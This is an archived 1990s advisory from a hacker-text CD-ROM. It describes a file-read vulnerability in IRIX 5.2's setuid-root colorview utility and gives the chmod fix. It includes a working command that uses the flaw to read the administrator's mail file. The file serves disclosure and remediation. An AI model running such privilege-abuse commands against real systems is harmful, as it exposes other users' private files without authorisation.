home *** CD-ROM | disk | FTP | other *** search
/ The Hacker's Encyclopedia 1998 / hackers_encyclopedia.iso / hacking / unix / colorvie.txt < prev    next >
Encoding:
Text File  |  2003-06-11  |  753 b   |  23 lines
  1. A vulnerability exists under IRIX 5.2 (std release) that allows any
  2. user to read any file on the system.
  3.  
  4. % uname -a
  5. IRIX bailer 5.2 02282016 IP22 mips
  6.  
  7. % ls -als /usr/sbin/colorview
  8.  742 -rwsr-xr-x    1 root     sys       379680 Jun  7 10:36 /usr/sbin/colorview
  9.  
  10. An example (to view the admin's mail file):
  11. % /usr/sbin/colorview -text /var/spool/mail/admin
  12.  
  13.  
  14. To correct this:
  15.  
  16. # chmod u-s /usr/sbin/colorview
  17. --
  18. /-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\
  19. | Blackstar - jmartin@herky.cs.uiowa.edu                          |
  20. | "Beware of the bugs in the above code; I have only proved it    |
  21. |  correct, not tried it."  -- Donald Knuth                       |
  22. \-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-/
  23.